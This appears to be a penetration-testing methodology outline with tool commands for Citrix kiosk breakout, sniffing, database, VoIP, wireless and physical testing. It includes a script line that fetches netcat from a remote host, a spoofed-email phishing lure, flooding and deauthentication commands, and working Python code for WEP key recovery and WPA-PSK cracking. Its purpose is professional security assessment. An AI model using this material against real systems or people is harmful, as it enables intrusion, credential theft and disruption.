Nessus, Plugins, CGI abuses, NetScaler web management interface ip address cookie disclosure, CGI abuses : Cross Site Scripting (XSS), Citrix MetaFrame XP login.asp, Citrix NFuse Launch Scripts, NetScaler web management XSS, Misc., Citrix Published Applications Remote Enumeration, NetScaler web management cookie information, Service Detection, Citrix Licensing Server detection, Citrix Server detection, Web Servers, Citrix NFuse Server launch.asp Arbitrary Server/ Port Redirect, NetScaler web management cookie cipher weakness, NetScaler web management interface detection, Unencrypted NetScaler web management interface, Windows, Citrix Licensing Server License Management Console, Citrix Password Manager Agent Secondary Credential Information Disclosure, Citrix Password Manager Service Stored Credentials Disclosure, Citrix Presentation Server Remote Code Execution, Citrix Presentation Server Client Program Neighbourhood Agent (PNAgent) Denial of Service, Citrix web interface 4.6, 5.0, 5.0.1 XSS, NetScaler web management cookie cipher weakness, Novell Client TS/ Citrix Session Arbitrary User Profile Invocation, NetScaler web management interface detection, NetScaler web management login, Unencrypted NetScaler web management interface

Nikto, perl -host ip_address -port port_no.


Alter default .ica files, InitialProgram=cmd.exe, InitialProgram=explorer.exe

Enumerate and Connect, For applications identified by Citrix-pa-scan, Pas, Requires pas.wri to be present in the same directory (obtained from the output using Citrix-pa-scan), Writes output to pas_results.wri, For published applications with a Citrix client when the master browser is non-public., Citrix-pa-proxy, IP_to_proxy_to (i.e. remote server)

Manual Testing, Create Batch File (cmd.bat), 1, cmd.exe, 2, echo off, command, echo on, Host Scripting File (cmd.vbs), Option Explicit, Dim objShell, objShell.Run "%comspec% /k", WScript.Quit, alternative functionality, objShell.Run "%comspec% /k c: & dir", objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt", objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-), iKat, Integrated Kiosk Attack Tool, Reconnaissance, FileSystem Links, Common Dialogs, Application Handlers, Browser Plugins, iKAT Tools, AT Command - privilege escalation, AT HH:MM /interactive "cmd.exe", AT HH:MM /interactive %comspec% /k, Keyboard Shortcuts/ Hotkeys, Ctrl + h – View History, Ctrl + n – New Browser, Shift + Left Click – New Browser, Ctrl + o – Internet Address (browse feature), Ctrl + p – Print (to file), Right Click (Shift + F10), Save Image As, View Source, F1 – Jump to URL, SHIFT+F1: Local Task List, SHIFT+F2: Toggle Title Bar, SHIFT+F3: Close Remote Application, CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del, CTRL+F2: Remote Task List, CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC, ALT+F2: Cycle through programs, ALT+PLUS: Alt+TAB, ALT+MINUS: ALT+SHIFT+TAB

Brute Force

bforce.js, bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2, bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

Review Configuration Files

Application server configuration file, appsrv.ini, Location, <profile path>\Application Data\ICAClient, /usr/lib/ICAClient/config/appsrv.ini, $HOME/.ICAClient/appsrv.ini, Other ..., World writable, Citrix Server Allows Key Logging Functionality, perl wfcwin32.log, LogKeyboard=On, LogAppend=On, Review other files, wfcwin32.log, Mini-database containing published apps available, <profile path>\Application Data\ICAClient, Other ..., Sample file

Program Neighborhood configuration file, pn.ini, Location, <profile path>\Application Data\ICAClient, /usr/lib/ICAClient/config/pn.ini, Other ..., Review other files, .idx files, .vl files, The encrypted username, password, and domain name, Sample file

Citrix ICA client configuration file, wfclient.ini, Location, <profile path>\Application Data\ICAClient, /usr/lib/ICAClient/config/wfclient.ini, $HOME/.ICAClient/wfclient.ini


Vulnerabilities, Art of Hacking, Common Vulnerabilities and Exploits (CVE), Sample file, OSVDB, Secunia, SecurityFocus

Support, Citrix, Knowledge Base, Thinworld

Exploits, Milw0rm, Art of Hacking, Citrix

Tools Resource, Zip file containing the majority of the tools mentioned in this article, for easy download/access

Network Backbone

Generic Toolset

Wireshark (Formerly Ethereal), Passive Sniffing, Usernames/Passwords, Email, POP3, SMTP, IMAP, FTP, HTTP, HTTPS, RDP, VOIP, Other, Filters, ip.src == ip_address, ip.dst == ip_address, tcp.dstport == port_no., ! ip.addr == ip_address, (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

Cain & Abel, Active Sniffing, ARP Cache Poisoning, Usernames/Passwords, Email, POP3, SMTP, IMAP, FTP, HTTP, HTTPS, RDP, VOIP, Other, DNS Poisoning, Routing Protocols

Cisco-Torch, ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

NTP-Fingerprint, perl -t [ip_address]


p0f, ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

Manual Check (Credentials required)

MAC Spoofing, mac address changer for windows, macchanger, Random Mac Address:- macchanger -r eth0, madmacs, smac, TMAC

Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or various engines exist that are, at their simplest, pre-compiled point-and-shoot tools. These engines also have a number of other underlying features for more advanced users.

Password Attacks

Known Accounts, Identified Passwords, Unidentified Hashes

Default Accounts, Identified Passwords, Unidentified Hashes


Successful Exploits, Accounts, Passwords, Cracked, Uncracked, Groups, Other Details, Services, Backdoor, Connectivity

Unsuccessful Exploits

Resources, Securiteam, Exploits are sorted by year and must be downloaded individually, SecurityForest, Updated via CVS after initial install, GovernmentSecurity, Need to create an account to obtain access, Red Base Security, Oracle Exploit site only, Wireless Vulnerabilities & Exploits (WVE), Wireless Exploit Site, PacketStorm Security, Exploits downloadable by month and year but no indexing carried out., SecWatch, Exploits sorted by year and month, download separately, SecurityFocus, Exploits must be downloaded individually, Metasploit, Install and regularly update via svn, Milw0rm, Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!


Metasploit, Free Extra Modules, local copy

Manual SQL Injection, Understanding SQL Injection, SQL Injection walkthrough, SQL Injection by example, Blind SQL Injection, Advanced SQL Injection in SQL Server, More Advanced SQL Injection, Advanced SQL Injection in Oracle databases, SQL Cheatsheets

SQL Power Injector


SPI Dynamics WebInspect

Core Impact

Cisco Global Exploiter

PIXDos, perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]



Server Specific Tests


Direct Access Interrogation, MS SQL Server, Ports, UDP, TCP, Version, SQL Server Resolution Service (SSRS), Other, osql, Attempt default/common accounts, Retrieve data, Extract sysxlogins table, Oracle, Ports, UDP, TCP, TNS Listener, VSNUM Converted to hex, Ping / version / status / debug / reload / services / save_config / stop, Leak attack, SQL Plus, Default Account/Passwords, Default SIDs, MySQL, Ports, UDP, TCP, Version, Users/Passwords, mysql.user, DB2, Informix, Sybase, Other

Scans, Default Ports, Non-Default Ports, Instance Names, Versions

Password Attacks, Sniffed Passwords, Cracked Passwords, Hashes, Direct Access Guesses

Vulnerability Assessment, Automated, Reports, Vulnerabilities, Severe, High, Medium, Low, Manual, Patch Levels, Missing Patches, Confirmed Vulnerabilities, Severe, High, Medium, Low



Fingerprint, Manual, Automated

Spoofable, Telnet spoof, telnet target_IP 25helo target.commail from: XXXX@XXX.comrcpt to: administrator@target.comdataX-Sender: XXXX@XXX.comX-Originating-IP: []X-Originating-Email: []MIME-Version: 1.0To: <>From: < >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=></a>Online Security Manager.Target



Scanning, 500 UDP IPSEC, 1723 TCP PPTP, 443 TCP/SSL, nmap -sU -PN -p 500, ipsecscan

Fingerprinting, ike-scan --showbackoff

PSK Crack, ikeprobe, sniff for responses with C&A or ikecrack


Vulnerability Assessment, Automated, Reports, Vulnerabilities, Severe, High, Medium, Low, Manual, Patch Levels, Missing Patches, Confirmed Vulnerabilities, Severe, High, Medium, Low

Permissions, PUT /test.txt HTTP/1.0, CONNECT HTTP/1.0, POST HTTP/1.0 Content-Type: text/plain Content-Length: 6


Fingerprinting, Other, HTTP, Commands, JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0, GET /images HTTP/1.0, PROPFIND / HTTP/1.0, Modules, WebDAV, ASP.NET, Frontpage, OWA, IIS ISAPI, PHP, OpenSSL, File Extensions, .ASP, .HTM, .PHP, .EXE, .IDQ, HTTPS, Commands, JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0, Commands, JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0, File Extensions, .ASP, .HTM, .PHP, .EXE, .IDQ

Directory Traversal,\

VoIP Security

Sniffing Tools


Cain & Abel

SIPv6 Analyzer

WIST - Web Interface for SIP Trace

Scanning and Enumeration Tools



IAX Enumerator




SIP Forum Test Framework (SFTF)


sipflanker, python 192.168.1-254

SMAP, smap IP_Address/Subnet_Mask, smap -o IP_Address/Subnet_Mask, smap -l IP_Address




VoIP GHDB Entries

VoIP Voicemail Database

Packet Creation and Flooding Tools

H.323 Injection Files





IAXFlooder, ./iaxflood sourcename destinationname numpackets

INVITE Flooder, ./inviteflood interface target_user target_domain ip_address_target no_of_packets


RTP Flooder

SIPsak, Tracing paths:- sipsak -T -s sip:username@domain, Options request:- sipsak -vv -s sip:username@domain, Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

TFTP Brute Force, perl <tftpserver> <filelist> <maxprocesses>

UDP Flooder, ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

UDP Flooder (with VLAN Support), ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets


Fuzzing Tools


Codenomicon VoIP Fuzzers

Fuzzy Packet

Mu Security VoIP Fuzzing Platform

ohrwurm RTP Fuzzer

PROTOS H.323 Fuzzer


SIP Forum Test Framework (SFTF)


Signaling Manipulation Tools

AuthTool, ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

BYE Teardown

Check Sync Phone Rebooter


Registration Adder

Registration Eraser

Registration Hijacker

Media Manipulation Tools

RTP InsertSound, ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

RTP MixSound, ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file



Generic Software Suites

OAT Office Communication Server Tool Assessment

EnableSecurity VOIPPACK, Note: - Add-on for Immunity Canvas


URLs, Common Vulnerabilities and Exploits (CVE), Vulnerabilities and exploit information relating to these products can be found here:, Default Passwords, Hacking Exposed VoIP, Tool Pre-requisites, Hack Library, g711conversions, VoIPsa

White Papers, An Analysis of Security Threats and Tools in SIP-Based VoIP Systems, An Analysis of VoIP Security Threats and Tools, Hacking VoIP Exposed, Security testing of SIP implementations, SIP Stack Fingerprinting and Stack Difference Attacks, Two attacks against VoIP, VoIP Attacks!, VoIP Security Audit Program (VSAP)

Spirent ThreatEx

Wireless Penetration

Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

Site Map, RF Map, Lines of Sight, Signal Coverage, Standard Antenna, Directional Antenna, Physical Map, Triangulate APs, Satellite Imagery

Network Map, MAC Filter, Authorised MAC Addresses, Reaction to Spoofed MAC Addresses, Encryption Keys utilised, WEP, Key Length, Crack Time, Key, WPA/PSK, TKIP, Temporal Key Integrity Protocol (TKIP) is an encryption protocol designed to replace WEP, Key, Attack Time, AES, Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data., Key, Attack Time, 802.1x, Derivative of 802.1x in use, Access Points, ESSID, Extended Service Set Identifier (ESSID). Utilised on wireless networks with an access point, Broadcast ESSIDs, BSSIDs, Basic Service Set Identifier (BSSID), utilised on ad-hoc wireless networks., Vendor, Channel, Associations, Rogue AP Activity, Wireless Clients, MAC Addresses, Vendor, Operating System Details, Adhoc Mode, Associations, Intercepted Traffic, Encrypted, Clear Text


./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

Wireless Toolkit

Wireless Discovery, Aerosol, Airfart, Aphopper, Apradar, BAFFLE, inSSIDer, iWEPPro, karma, KisMAC-ng, Kismet, MiniStumbler, Netstumbler, Vistumbler, Wellenreiter, Wifi Hopper, WirelessMon, WiFiFoFum

Packet Capture, Airopeek, Airpcap, Airtraf, Apsniff, Cain, Commview, Ettercap, Netmon, nmwifi, Wireshark

EAP Attack tools, eapmd5pass, eapmd5pass -w dictionary_file -r eapmd5-capture.dump, Untitled

Leap Attack Tools, asleap, thc leap cracker, anwrap

WEP/ WPA Password Attack Tools, Airbase, Aircrack-ptw, Aircrack-ng, Airsnort, cowpatty, FiOS Wireless Key Calculator, iWifiHack, KisMAC-ng, Rainbow Tables, wep attack, wep crack, wzcook

Frame Generation Software, Airgobbler, airpwn, Airsnarf, Commview, fake ap, void 11, wifi tap, wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h], FreeRADIUS - Wireless Pwnage Edition

Mapping Software, Online Mapping, WIGLE, Skyhook, Tools, Knsgem

File Format Conversion Tools, ns1 recovery and conversion tool, warbable, warkizniz, warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename], ivstools

IDS Tools, WIDZ, War Scanner, Snort-Wireless, AirDefense, AirMagnet

WLAN discovery

Unencrypted WLAN, Visible SSID, Sniff for IP range, MAC authorised, MAC filtering, Spoof valid MAC, Linux, ifconfig [interface] hw ether [MAC], macchanger, Random MAC address: macchanger -r eth0, MAC address changers for Windows, madmacs, TMAC, SMAC, Hidden SSID, Deauth client, Aireplay-ng, aireplay-ng -0 1 -a [Access Point MAC] -c [Client MAC] [interface], Commview, Tools > Node reassociation, Void11, void11_penetration wlan0 -D -t 1 -B [MAC]

WEP encrypted WLAN, Visible SSID, WEPattack, wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network], Capture / Inject packets, Break WEP, Aircrack-ptw, aircrack-ptw [pcap file], Aircrack-ng, aircrack-ng -q -n [WEP key length] -b [BSSID] [pcap file], Airsnort, Channel > Start, WEPcrack, perl, ./ -b 13 -i wlan0, Hidden SSID, Deauth client, Aireplay-ng, aireplay-ng -0 1 -a [Access Point MAC] -c [Client MAC] [interface], Commview, Tools > Node reassociation, Void11, void11_hopper, void11_penetration [interface] -D -t [type of attack] -s [station MAC] -S [SSID] -B [BSSID]
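The WEP crackers above (WEPcrack, Airsnort, the original aircrack) all rest on the FMS weak-IV attack from "Weaknesses in the Key Scheduling Algorithm of RC4" (listed under White Papers below). The following is an added example written for this page, not code from the Penetration Testing Framework or from any of those tools: it builds a constructed capture of weak-IV frames for a 40-bit key, then recovers the key byte by byte from the first ciphertext byte of each frame, and searches over the best-voted candidates the way aircrack's fudge factor does. The key, IVs and helper names are all assumptions made for the example.

```python
"""Added example (not from the Penetration Testing Framework or any listed
tool): FMS weak-IV key recovery against WEP, with aircrack-style candidate
search. Constructed traffic, constructed 40-bit key."""
from typing import List, Optional, Tuple

# Every WEP data frame starts with the 802.2 SNAP header AA AA 03, so the
# first plaintext byte is known and the first keystream byte is c0 ^ 0xAA.
SNAP_FIRST_BYTE = 0xAA

def ksa_partial(key: bytes, steps: int) -> Tuple[List[int], int]:
    """First `steps` rounds of the RC4 KSA with `key` repeated cyclically;
    returns the permutation S and j afterwards. steps == 256 is the full KSA."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S, j

def rc4_keystream(key: bytes, n: int) -> bytes:
    S, _ = ksa_partial(key, 256)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

def rc4(key: bytes, data: bytes) -> bytes:
    return bytes(k ^ d for k, d in zip(rc4_keystream(key, len(data)), data))

def wep_first_ciphertext_byte(wep_key: bytes, iv: bytes) -> int:
    """WEP seeds RC4 with IV || key and sends the 3-byte IV in clear."""
    return rc4_keystream(iv + wep_key, 1)[0] ^ SNAP_FIRST_BYTE

def make_weak_iv_capture(wep_key: bytes) -> List[Tuple[bytes, int]]:
    """Constructed capture: for each key byte B, one frame per IV of the FMS
    form (B+3, 0xFF, X). On a real network these arrive slowly unless traffic
    is injected (aireplay-ng)."""
    capture = []
    for b in range(len(wep_key)):
        for x in range(256):
            iv = bytes([b + 3, 0xFF, x])
            capture.append((iv, wep_first_ciphertext_byte(wep_key, iv)))
    return capture

def fms_votes(capture: List[Tuple[bytes, int]], known: bytes) -> List[int]:
    """Vote for key byte number len(known), given the bytes already recovered."""
    i = 3 + len(known)                      # position of the attacked byte in IV || key
    votes = [0] * 256
    for iv, c0 in capture:
        if iv[0] != i:
            continue
        S, j = ksa_partial(iv + known, i)   # rounds 0..i-1 depend only on IV and known bytes
        # "Resolved" IV: if S[0], S[1], S[i] survive the remaining rounds (~5%),
        # the first PRGA output z equals S_prev[j_i], so j_i = S_prev^-1[z]
        # and K[i] = j_i - j_prev - S_prev[i]. Wrong IVs vote roughly uniformly.
        if S[1] >= i or (S[1] + S[S[1]]) % 256 != i:
            continue
        z = c0 ^ SNAP_FIRST_BYTE
        votes[(S.index(z) - j - S[i]) % 256] += 1
    return votes

def key_is_correct(candidate: bytes, capture, checks: int = 16) -> bool:
    # A wrong key passes each single-byte check with probability 1/256.
    return all(wep_first_ciphertext_byte(candidate, iv) == c0 for iv, c0 in capture[:checks])

def recover_wep_key(capture, key_len: int = 5, fudge: int = 3) -> Optional[bytes]:
    """Depth-first search over the `fudge` best-voted candidates per byte,
    each full candidate verified against the capture (aircrack's -f idea)."""
    def search(known: bytes) -> Optional[bytes]:
        if len(known) == key_len:
            return known if key_is_correct(known, capture) else None
        votes = fms_votes(capture, known)
        for guess in sorted(range(256), key=lambda k: -votes[k])[:fudge]:
            found = search(known + bytes([guess]))
            if found is not None:
                return found
        return None
    return search(b"")

WEP_KEY = bytes.fromhex("0a1b2c3d4e")   # constructed key, unknown to the attack
CAPTURE = make_weak_iv_capture(WEP_KEY)

if __name__ == "__main__":
    print("recovered WEP key:", recover_wep_key(CAPTURE).hex())
```

The attack needs only the IV and the first ciphertext byte of each frame, which is why the tools can work from the `ivstools`-style IV files listed above rather than full captures; the candidate search is what lets them succeed when the highest-voted byte is occasionally wrong.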

WPA / WPA2 encrypted WLAN, Deauth client, Capture EAPOL handshake, WPA / WPA2 dictionary attack, coWPAtty, ./cowpatty -r [pcap file] -f [wordlist] -s [SSID], ./genpmk -f dictionary_file -d hashfile_name -s ssid, ./cowpatty -r capture_file.cap -d hashfile_name -s ssid, Aircrack-ng, aircrack-ng -a 2 -w [wordlist] [pcap file]
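What coWPAtty, genpmk and aircrack-ng -a 2 compute from the captured handshake, as an added example written for this page (not code from the framework or from those tools): the passphrase is stretched with PBKDF2 salted by the SSID into the PMK, the PMK plus the two MACs and two nonces from the handshake give the PTK, and the first 16 bytes of the PTK authenticate message 2, so each dictionary word is checked by recomputing that MIC. The handshake below is constructed (MACs, nonces, frame layout and the "password"/"IEEE" pair are assumptions), and the per-SSID table shows why a genpmk hash file built with the wrong -s is useless.

```python
"""Added example (not from the Penetration Testing Framework, coWPAtty or
aircrack-ng): WPA/WPA2-PSK dictionary attack against a constructed 4-way
handshake, including genpmk-style PMK precomputation."""
import hashlib
import hmac
from typing import Dict, Iterable, Optional

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt: this is why genpmk -s needs it and why a
    precomputed table is only valid for that one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]

def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Everything here except the PMK is visible in the captured handshake."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck: bytes, frame_mic_zeroed: bytes, key_version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP)
    HMAC-SHA1 truncated to 128 bits. KCK = PTK[0:16]."""
    digest = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, frame_mic_zeroed, digest).digest()[:16]

def build_msg2_mic_zeroed(snonce: bytes, key_version: int, replay_counter: int = 1) -> bytes:
    """Handshake message 2 (STA -> AP) with the MIC field zeroed; constructed
    here, normally sliced straight out of the capture."""
    descriptor = b"\x02" if key_version == 2 else b"\xfe"          # RSN vs WPA descriptor type
    key_info = (0x0108 | key_version).to_bytes(2, "big")         # pairwise, MIC present, version
    body = (descriptor + key_info + b"\x00\x00" + replay_counter.to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, RSC, key ID
            + b"\x00" * 16                                         # MIC field, zero for the computation
            + b"\x00\x00")                                         # key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body      # 802.1X v1, type EAPOL-Key

def genpmk_table(ssid: str, words: Iterable[str]) -> Dict[str, bytes]:
    """The expensive PBKDF2 step done once per SSID, as genpmk -d does."""
    return {w: pmk_from_passphrase(w, ssid) for w in words}

def crack_handshake(hs: dict, words: Iterable[str],
                    pmk_table: Optional[Dict[str, bytes]] = None) -> Optional[str]:
    for word in words:
        pmk = pmk_table[word] if pmk_table is not None else pmk_from_passphrase(word, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["key_version"]), hs["mic"]):
            return word
    return None

def constructed_handshake(passphrase: str, ssid: str, key_version: int = 2) -> dict:
    """Stand-in for a capture: plays the client side to produce a genuine MIC."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                          # constructed
    eapol = build_msg2_mic_zeroed(snonce, key_version)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "key_version": key_version,
            "mic": eapol_mic(kck, eapol, key_version)}

SAMPLE = constructed_handshake("password", "IEEE")   # the PSK is unknown to the attack

if __name__ == "__main__":
    print("recovered PSK:", crack_handshake(SAMPLE, ["letmein", "12345678", "password"]))
```

The PBKDF2 step dominates the cost, which is why the tools precompute it per SSID and why WPA-PSK cracking scales with wordlist quality rather than with handshake count; a PMK table built for one SSID fails against a network with any other SSID, as the example's table lookup shows.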

LEAP encrypted WLAN, Deauth client, Break LEAP, asleap, ./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash_file.dat -n output_index_filename.idx, ./genkeys -r dictionary_file -f output_pass+hash_file.dat -n output_index_filename.idx, THC-LEAPcracker, leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge]

802.1x WLAN, Create Rogue Access Point, Airsnarf, Deauth client, Associate client, Compromise client, Acquire passphrase / certificate, wzcook, Obtain user's certificate, FakeAP, perl --interface wlan0, perl --interface wlan0 --channel 11 --essid fake_name --wep 1 --key [WEP KEY], Hotspotter, Deauth client, Associate client, Compromise client, Acquire passphrase / certificate, wzcook, Obtain user's certificate, Karma, Deauth client, Associate client, Compromise client, Acquire passphrase / certificate, wzcook, Obtain user's certificate, ./bin/karma etc/karma-lan.xml, Linux rogue AP, Deauth client, Associate client, Compromise client, Acquire passphrase / certificate, wzcook, Obtain user's certificate

Resources, URLs, Russix, Wireless Vulnerabilities and Exploits (WVE), White Papers, Weaknesses in the Key Scheduling Algorithm of RC4, 802.11b Firmware-Level Attacks, Wireless Attacks from an Intrusion Detection Perspective, Implementing a Secure Wireless Network for a Windows Environment, Breaking 104 bit WEP in less than 60 seconds, PEAP Shmoocon2008 Wright & Antoniewicz, Active behavioral fingerprinting of wireless devices, Common Vulnerabilities and Exposures (CVE), Vulnerability and exploit information relating to these products can be found here:

Physical Security

Building Security

Meeting Rooms, Check for active network jacks., Check for any information in room.

Lobby, Check for active network jacks., Does receptionist/guard leave lobby?, Accessible printers? Print test page., Obtain phone/personnel listing.

Communal Areas, Check for active network jacks., Check for any information in room., Listen for employee conversations.

Room Security, Resistance of lock to picking., What type of locks are used in building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?, Ceiling access areas., Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

Windows, Check windows/doors for visible intruder alarm sensors., Check visible areas for sensitive information., Can you video users logging on?

Perimeter Security

Fence Security, Attempt to verify that the whole of the perimeter fence is unbroken.

Exterior Doors, If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.

Guards, Patrol Routines, Analyse patrol timings to ascertain if any holes exist in the coverage., Communications, Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.

Entry Points

Guarded Doors, Piggybacking, Attempt to closely follow employees into the building without having to show valid credentials., Fake ID, Attempt to use fake ID to gain access., Access Methods, Test 'out of hours' entry methods

Unguarded Doors, Identify all unguarded entry points., Are doors secured?, Check locks for resistance to lock picking.

Windows, Check windows/doors for visible intruder alarm sensors., Attempt to bypass sensors.

Office Waste

Dumpster Diving, Attempt to retrieve any useful information from Target of Evaluation (ToE) refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.

Final Report - template


Matt Byrne

Matt contributed the majority of the Wireless section.

Arvind Doraiswamy

Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

Lee Lawson

Lee contributed the majority of the Cisco and Social Engineering sections.

Nabil OUCHN